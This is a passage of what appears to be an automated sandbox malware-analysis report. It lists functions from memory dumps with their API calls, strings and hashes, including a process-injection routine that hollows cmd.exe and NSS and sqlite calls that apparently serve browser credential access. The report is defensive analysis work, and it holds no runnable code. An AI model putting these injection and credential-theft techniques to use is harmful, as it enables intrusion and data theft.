Instruction Fuzzy Hash: 3E02AEB0E006788BDF21CF64D8807EEBBB6AF46304F0444E9D949AB242D6719E85CF95

Function 6C3D1C30 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 6C3D1C6B
OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6C3D1C75
GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6C3D1CA1
GetLengthSid.ADVAPI32(?), ref: 6C3D1CA9
malloc.MOZGLUE(00000000), ref: 6C3D1CB4
CopySid.ADVAPI32(00000000,00000000,?), ref: 6C3D1CCC
GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6C3D1CE4
GetLengthSid.ADVAPI32(?), ref: 6C3D1CEC
malloc.MOZGLUE(00000000), ref: 6C3D1CFD
CopySid.ADVAPI32(00000000,00000000,?), ref: 6C3D1D0F
CloseHandle.KERNEL32(?), ref: 6C3D1D17
AllocateAndInitializeSid.ADVAPI32 ref: 6C3D1D4D
GetLastError.KERNEL32 ref: 6C3D1D73
PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6C3D1D7F

Strings

_PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6C3D1D7A

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
API String ID: 3748115541-1216436346
Opcode ID: 1d937e7a2af538901dd77ffe390e694014d1e8010d818a047b7c41858ff90755
Instruction ID: 52fef9e9555457cf3ea46d37eb2cab2edd2298c2a311402deee18535282d90bb
Opcode Fuzzy Hash: 1d937e7a2af538901dd77ffe390e694014d1e8010d818a047b7c41858ff90755
Instruction Fuzzy Hash: 873145B56012289FEF20EF64CC48BAA7BB8FF4A345F014569F609D2650F7306994CF69

Function 6C3D3D00 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 446COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C3D3DFB
__allrem.LIBCMT ref: 6C3D3EEC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C3D3FA3
memcpy.VCRUNTIME140(?,?,00000001), ref: 6C3D4047
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C3D40DE
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C3D415F
__allrem.LIBCMT ref: 6C3D416B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C3D4288
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C3D42AB
__allrem.LIBCMT ref: 6C3D42B7

Strings

%lld, xrefs: 6C3D3FB2
%04d, xrefs: 6C3D407B
%03d, xrefs: 6C3D42E8
%02d, xrefs: 6C3D4086

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
String ID: %02d$%03d$%04d$%lld
API String ID: 703928654-3678606288
Opcode ID: f22cc764ffbb830d94f525d7c88e2bba05e5aa80cc5a256696a3bf47b1583241
Instruction ID: e5c672617451498066df5cc4863c79e474443d256de7ca2c7f764bc2b7a332b3
Opcode Fuzzy Hash: f22cc764ffbb830d94f525d7c88e2bba05e5aa80cc5a256696a3bf47b1583241
Instruction Fuzzy Hash: 0CF13172A087409FD315CF38C881AABB7FAAF85308F158A2DF49597651E731E845CF82

Function 006212EC Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 130threadinjectionmemoryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0062131E
CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,00647615,00000000,00000000,00000001,00000004,00000000,00000000,?,?,00000000,00000000,?), ref: 00621342
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00621354
GetThreadContext.KERNEL32(?,00000000), ref: 00621366
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00621384
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0062139A
ResumeThread.KERNEL32(?), ref: 006213AA
WriteProcessMemory.KERNEL32(?,00000000,006249B4,?,00000000), ref: 006213C9
WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 006213FF
WriteProcessMemory.KERNEL32(?,?,D74DE8E8,00000004,00000000), ref: 00621426
SetThreadContext.KERNEL32(?,00000000), ref: 00621438
ResumeThread.KERNEL32(?), ref: 00621441

Strings

(, xrefs: 00621408
C:\Windows\System32\cmd.exe, xrefs: 0062133D

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Process$MemoryThread$Write$AllocContextResumeVirtual$CreateRead_memset
String ID: ($C:\Windows\System32\cmd.exe
API String ID: 3621800378-4087486346
Opcode ID: ca6601d8446640efc60def1d5e7c302afebec8ff228e122e7f2ae67050076042
Instruction ID: 678d9ed67a38d60e4344dfb196c93b030ff742cee2afa6486ba3311accf0bc6d
Opcode Fuzzy Hash: ca6601d8446640efc60def1d5e7c302afebec8ff228e122e7f2ae67050076042
Instruction Fuzzy Hash: 9B412672A00608AFDB11DFA4DD85FEABBBAFF49705F004464FA05EA161D775A9408B24

Function 6C381C30 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 485COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C381D58
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C381EFD
sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6C381FB7

Strings

sqlite_temp_master, xrefs: 6C381C5C
unknown error, xrefs: 6C382291
no more rows available, xrefs: 6C382264
another row available, xrefs: 6C382287
sqlite_master, xrefs: 6C381C61
unsupported file format, xrefs: 6C382188
abort due to ROLLBACK, xrefs: 6C382223
SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6C381F83
table, xrefs: 6C381C8B
attached databases must use the same text encoding as main database, xrefs: 6C3820CA

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
API String ID: 563213449-2102270813
Opcode ID: 131bc2952874542ac7f686beb5c9122f6334d40a96d3719b0975f9f748bf4c69
Instruction ID: 6ed34e8f460b9e057534ecfed2f26e704aec6752fbd447ca665a04d9f59a977e
Opcode Fuzzy Hash: 131bc2952874542ac7f686beb5c9122f6334d40a96d3719b0975f9f748bf4c69
Instruction Fuzzy Hash: B312DF706093018FD705CF19C484B5AB7F2BF85318F18896DE8998BB56D732E84ACF92

Function 6C36ECC0 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 741COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C36ED0A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C36EE68
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C36EF87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6C36EF98

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C36F483
database corruption, xrefs: 6C36F48D
%s at line %d of [%.10s], xrefs: 6C36F492

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 4101233201-598938438
Opcode ID: 56b7ac11dda6f0970cb615a44d9ac051e779ec8bbe2801354ccad59535087765
Instruction ID: a462df76d93801f8777c64c8f0e37118c610165e4dd1073f2b77565e168307f6
Opcode Fuzzy Hash: 56b7ac11dda6f0970cb615a44d9ac051e779ec8bbe2801354ccad59535087765
Instruction Fuzzy Hash: 6D620330A043458FDB14CF66C884BAABBB1BF4931CF184158D8455BF9AD736E886CFA1

Function 6C40FC80 Relevance: 19.8, APIs: 13, Instructions: 311COMMON

Download Yara Rule

APIs

PK11_HPKE_NewContext.NSS3(?,?,?,00000000,00000000), ref: 6C40FD06

Part of subcall function 6C40F670: PORT_ZAlloc_Util.NSS3(00000038), ref: 6C40F696
Part of subcall function 6C40F670: PK11_FreeSymKey.NSS3(?,?,?), ref: 6C40F789
Part of subcall function 6C40F670: SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?), ref: 6C40F796
Part of subcall function 6C40F670: free.MOZGLUE(00000000,?,?,?,?,?), ref: 6C40F79F
Part of subcall function 6C40F670: SECITEM_DupItem_Util.NSS3 ref: 6C40F7F0

Part of subcall function 6C433440: PK11_GetAllTokens.NSS3 ref: 6C433481
Part of subcall function 6C433440: PR_SetError.NSS3(00000000,00000000), ref: 6C4334A3
Part of subcall function 6C433440: TlsGetValue.KERNEL32 ref: 6C43352E
Part of subcall function 6C433440: EnterCriticalSection.KERNEL32(?), ref: 6C433542
Part of subcall function 6C433440: PR_Unlock.NSS3(?), ref: 6C43355B

SECITEM_DupItem_Util.NSS3(?), ref: 6C40FDAD

Part of subcall function 6C43FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C3E9003,?), ref: 6C43FD91
Part of subcall function 6C43FD80: PORT_Alloc_Util.NSS3(A4686C44,?), ref: 6C43FDA2
Part of subcall function 6C43FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C44,?,?), ref: 6C43FDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6C40FE00

Part of subcall function 6C43FD80: free.MOZGLUE(00000000,?,?), ref: 6C43FDD1

Part of subcall function 6C42E550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C42E5A0

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C40FEBB
PK11_FreeSymKey.NSS3(00000000), ref: 6C40FEC8
PK11_HPKE_DestroyContext.NSS3(00000000,00000001), ref: 6C40FED3
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C40FF0C
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C40FF23
PK11_ImportSymKey.NSS3(?,?,00000004,82000105,?,00000000), ref: 6C40FF4D
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C40FFDA
PK11_ImportSymKey.NSS3(?,0000402A,00000004,0000010C,?,00000000), ref: 6C410007
PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6C410029
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C410044

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: K11_$ErrorUtil$Item_$Alloc_Context$FreeImportfree$CreateCriticalDestroyEnterSectionTokensUnlockValueZfreememcpy
String ID:
API String ID: 138705723-0
Opcode ID: 26f5382c208a7a8b130f2f15909374b4f01b3c59598219cdc7a524f36266f5d7
Instruction ID: c03633bc10c8f567c5cae2c0698583dd67fa81b176f648a0dd3bef1b39d317ab
Opcode Fuzzy Hash: 26f5382c208a7a8b130f2f15909374b4f01b3c59598219cdc7a524f36266f5d7
Instruction Fuzzy Hash: 39B1B271605201AFE304CF29C881E6AB7E5FF88319F548A3DE99987B81E770E945CB91

Function 6C407D60 Relevance: 18.3, APIs: 12, Instructions: 299COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?), ref: 6C407DDC

Part of subcall function 6C4407B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C3E8298,?,?,?,6C3DFCE5,?), ref: 6C4407BF
Part of subcall function 6C4407B0: PL_HashTableLookup.NSS3(?,?), ref: 6C4407E6
Part of subcall function 6C4407B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C44081B
Part of subcall function 6C4407B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C440825

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C407DF3
PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6C407F07
PK11_GetPadMechanism.NSS3(00000000), ref: 6C407F57
PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6C407F98
PK11_FreeSymKey.NSS3(?), ref: 6C407FC9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C407FDE
PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6C408000

Part of subcall function 6C429430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6C407F0C,?,00000000,00000000,00000000,?), ref: 6C42943B
Part of subcall function 6C429430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6C42946B
Part of subcall function 6C429430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6C429546

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C408110
PK11_FreeSymKey.NSS3(00000000), ref: 6C40811D
PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C40822D
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C40823C

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
String ID:
API String ID: 1923011919-0
Opcode ID: 2071231e0bb2768e1db0443637a7e67c5b593bbedd1a75985a373b13b574c479
Instruction ID: 70b660ffb632570bff72751be48621b59f4d06812bf89c6e4d9e2e8db8c052d4
Opcode Fuzzy Hash: 2071231e0bb2768e1db0443637a7e67c5b593bbedd1a75985a373b13b574c479
Instruction Fuzzy Hash: D7C18EB1E442199FEB21CF14CD40FEAB7B9AF15308F0081E9E91DA6641E7319E85CFA1

Function 0061DD2A Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 298filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0061DD4F
FindFirstFileA.KERNEL32(?,?), ref: 0061DD66
StrCmpCA.SHLWAPI(?,006486B4), ref: 0061DD87
StrCmpCA.SHLWAPI(?,006486B8), ref: 0061DDA1

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Part of subcall function 00622223: lstrcpyA.KERNEL32(00000000,?,0000000C,00629228,00647803), ref: 00622251
Part of subcall function 00622223: lstrcatA.KERNEL32(?,?), ref: 0062225B

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

lstrlenA.KERNEL32(0061E3A8,0064794F,006486BC,?,0064794E), ref: 0061DE34
DeleteFileA.KERNEL32(?,006486D4,00647952,?,006486D0,006486CC,006486C8,006486C4), ref: 0061E115
CopyFileA.KERNEL32(?,?,00000001), ref: 0061E129

Part of subcall function 00622175: lstrcpyA.KERNEL32(00000000,?,?,00611CF7,?,00629260), ref: 00622194

Part of subcall function 00619148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0061F752,?,?,?), ref: 00619163
Part of subcall function 00619148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0061F752,?,?,?), ref: 0061917A
Part of subcall function 00619148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0061F752,?,?,?), ref: 00619191
Part of subcall function 00619148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0061F752,?,?,?), ref: 006191A8
Part of subcall function 00619148: CloseHandle.KERNEL32(?,?,?,?,?,0061F752,?,?,?), ref: 006191D0

Part of subcall function 00628BE6: CreateThread.KERNEL32(00000000,00000000,00628B15,?,00000000,00000000), ref: 00628C85
Part of subcall function 00628BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00628C8D

FindNextFileA.KERNEL32(?,?), ref: 0061E22F
FindClose.KERNEL32(?), ref: 0061E243

Strings

%s\*.*, xrefs: 0061DD49

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: File$lstrcpy$Find$CloseCreatelstrcatlstrlen$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeThreadWaitwsprintf
String ID: %s\*.*
API String ID: 3967855609-1013718255
Opcode ID: b75edd5702c3df561aeed81aa8064cbdda0ba5e7f7d19ca4e086fce5e8d300ec
Instruction ID: 942b8d1434df386c1a6d978ac43c972d8fc19db41ea4dbf92cf4452506c5475a
Opcode Fuzzy Hash: b75edd5702c3df561aeed81aa8064cbdda0ba5e7f7d19ca4e086fce5e8d300ec
Instruction Fuzzy Hash: EFD11D32D0252EAADFA0EB25ED56ADD737AAF44310F4104E5BA0877122DB316FD58F84

Function 6C431CE0 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 401COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000020), ref: 6C431F19
memcpy.VCRUNTIME140(?,?,00000020), ref: 6C432166
memcpy.VCRUNTIME140(?,?,00000010), ref: 6C43228F
memcpy.VCRUNTIME140(?,?,00000010), ref: 6C4323B8
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C43241C

Strings

serial, xrefs: 6C4322A2
manufacturer, xrefs: 6C432179
token, xrefs: 6C431F2C
model, xrefs: 6C4323CB, 6C4323EC

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: memcpy$Error
String ID: manufacturer$model$serial$token
API String ID: 3204416626-1906384322
Opcode ID: 7aef959d3f2e97dea9a63b9c3c75992c3ad8f7dc12a2366a190cf84a1063fed9
Instruction ID: 87a588218ca8d23fbf79afbae6ed42e2adea36d784629e55a6cc7d2c549f2574
Opcode Fuzzy Hash: 7aef959d3f2e97dea9a63b9c3c75992c3ad8f7dc12a2366a190cf84a1063fed9
Instruction Fuzzy Hash: 5D02E062D0C7D85EFB31C673C84CFD77AE09789329F08266DC9AE46783C7A859498391

Function 6C436C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C3E1C6F,00000000,00000004,?,?), ref: 6C436C3F

Part of subcall function 6C48C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C48C2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C3E1C6F,00000000,00000004,?,?), ref: 6C436C60
PR_ExplodeTime.NSS3(00000000,6C3E1C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C3E1C6F,00000000,00000004,?,?), ref: 6C436C94

Strings

gfff, xrefs: 6C436D66
gfff, xrefs: 6C436D30
gfff, xrefs: 6C436CF5
gfff, xrefs: 6C436CFD
gfff, xrefs: 6C436D9C

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: 202c9a27a5c716605c706f74c95646a4f5e334aef18451666abdfbc6d78676c8
Instruction ID: 4c298746ac275c1cb0839d595ed4a2e391b2da2a47932f472368bf2e5771deb2
Opcode Fuzzy Hash: 202c9a27a5c716605c706f74c95646a4f5e334aef18451666abdfbc6d78676c8
Instruction Fuzzy Hash: B8515B72B015494FD708CDADDC52ADABBDAABE4310F48C23AE441CF785E638D906C751

Function 0061B721 Relevance: 15.1, APIs: 10, Instructions: 94stringencryptionCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0061B75E
lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0061BA30), ref: 0061B779
